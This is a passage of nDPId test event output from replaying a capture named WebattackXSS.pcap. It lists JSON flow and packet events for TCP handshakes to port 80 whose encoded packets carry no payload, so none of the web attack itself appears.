+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347914710,"flow_last_seen":1499347919878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8894,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348041088,"flow_last_seen":1499348041088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348041088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8894,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1499348041088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348041088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l85AAD4GLgKsEAABwKgKMooOAFBaWpfjAAAAAKACchDg\/QAAAgQFtAQCCAoBPQAtAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8895,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":2,"flow_last_seen":1499348041088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348041088,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQig7ecTfrWlqX5KAScSD19wAAAgQFtAQCCAoD5tGhAT0ALQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":3,"flow_last_seen":1499348041088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348041088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l89AAD4GLgmsEAABwKgKMooOAFBaWpfk3nE37IAQAOWU\/wAAAQEICgE9AC0D5tGh"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348042384,"flow_last_seen":1499348042384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348042384,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1499348042384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348042384,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rjZAAD4GF5qsEAABwKgKMoocAFClJq9HAAAAAKACchB9ewAAAgQFtAQCCAoBPQFxAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":2,"flow_last_seen":1499348042384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348042384,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQihw9by\/zpSavSKAScSA6LAAAAgQFtAQCCAoD5tLlAT0BcQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":3,"flow_last_seen":1499348042385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348042385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rjdAAD4GF6GsEAABwKgKMoocAFClJq9IPW8v9IAQAOXZMwAAAQEICgE9AXED5tLl"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348043670,"flow_last_seen":1499348043670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348043670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1499348043670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348043670,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cMNAAD4GVQ2sEAABwKgKMooqAFAsTnJwAAAAAKACchAx2wAAAgQFtAQCCAoBPQKzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":2,"flow_last_seen":1499348043670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348043670,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiirQJ1Z6LE5ycaAScSA0CwAAAgQFtAQCCAoD5tQmAT0CswEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":3,"flow_last_seen":1499348043671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348043671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cMRAAD4GVRSsEAABwKgKMooqAFAsTnJx0CdWe4AQAOXTEgAAAQEICgE9ArMD5tQm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8933,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348046262,"flow_last_seen":1499348046262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348046262,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8933,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1499348046262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348046262,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bZhAAD4GWDisEAABwKgKMopEAFAJXWijAAAAAKACchBb9wAAAgQFtAQCCAoBPQU7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8934,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":2,"flow_last_seen":1499348046262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348046262,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQikQJGz7wCV1opKAScSA6NQAAAgQFtAQCCAoD5tavAT0FOwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8935,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":3,"flow_last_seen":1499348046263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348046263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bZlAAD4GWD+sEAABwKgKMopEAFAJXWikCRs+8YAQAOXZPAAAAQEICgE9BTsD5tav"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348047547,"flow_last_seen":1499348047547,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348047547,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1499348047547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348047547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PrNAAD4Ghx2sEAABwKgKMopSAFC7TzjPAAAAAKACchDYiQAAAgQFtAQCCAoBPQZ8AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":2,"flow_last_seen":1499348047547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348047547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQilKBYq9Yu0840KAScSDM1gAAAgQFtAQCCAoD5tfwAT0GfAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":3,"flow_last_seen":1499348047547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348047547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PrRAAD4GhySsEAABwKgKMopSAFC7TzjQgWKvWYAQAOVr3gAAAQEICgE9BnwD5tfw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8966,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348050079,"flow_last_seen":1499348050079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050079,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8966,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1499348050079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348050079,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Gn1AAD4Gq1OsEAABwKgKMopsAFCVUBKIAAAAAKACchAiPQAAAgQFtAQCCAoBPQj1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":2,"flow_last_seen":1499348050079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348050079,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQimww3+sulVASiaAScSAovgAAAgQFtAQCCAoD5tppAT0I9QEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":3,"flow_last_seen":1499348050080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348050080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Gn5AAD4Gq1qsEAABwKgKMopsAFCVUBKJMN\/rL4AQAOXHxQAAAQEICgE9CPUD5tpp"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347917322,"flow_last_seen":1499347922879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347917322,"flow_last_seen":1499347922879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347918608,"flow_last_seen":1499347923879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347918608,"flow_last_seen":1499347923879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347921170,"flow_last_seen":1499347926880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347921170,"flow_last_seen":1499347926880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347922471,"flow_last_seen":1499347927880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347922471,"flow_last_seen":1499347927880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347923737,"flow_last_seen":1499347928880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347923737,"flow_last_seen":1499347928880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348051362,"flow_last_seen":1499348051362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348051362,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1499348051362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348051362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ntRAAD4GJvysEAABwKgKMop6AFCG4ZTiAAAAAKACchCtAgAAAgQFtAQCCAoBPQo2AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":2,"flow_last_seen":1499348051362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348051362,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQinqx2HVxhuGU46AScSCnBwAAAgQFtAQCCAoD5tupAT0KNgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":3,"flow_last_seen":1499348051362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348051362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ntVAAD4GJwOsEAABwKgKMop6AFCG4ZTjsdh1coAQAOVGDwAAAQEICgE9CjYD5tup"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8987,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348052641,"flow_last_seen":1499348052641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348052641,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8987,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1499348052641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348052641,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j\/xAAD4GNdSsEAABwKgKMoqIAFBipISJAAAAAKACchDgSwAAAgQFtAQCCAoBPQt1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8988,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":2,"flow_last_seen":1499348052641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348052641,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiogIs7XwYqSEiqAScSBBtwAAAgQFtAQCCAoD5tzpAT0LdQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":3,"flow_last_seen":1499348052642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348052642,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j\/1AAD4GNdusEAABwKgKMoqIAFBipISKCLO18YAQAOXgvQAAAQEICgE9C3YD5tzp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348055228,"flow_last_seen":1499348055228,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348055228,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1499348055228,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348055228,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W0hAAD4GaoisEAABwKgKMoqiAFBaIFa0AAAAAKACchAUBAAAAgQFtAQCCAoBPQ38AAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":2,"flow_last_seen":1499348055228,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348055228,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiqK\/mxmbWiBWtaAScSBYVQAAAgQFtAQCCAoD5t9wAT0N\/AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9007,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":3,"flow_last_seen":1499348055229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348055229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W0lAAD4Gao+sEAABwKgKMoqiAFBaIFa1v5sZnIAQAOX3XAAAAQEICgE9DfwD5t9w"} 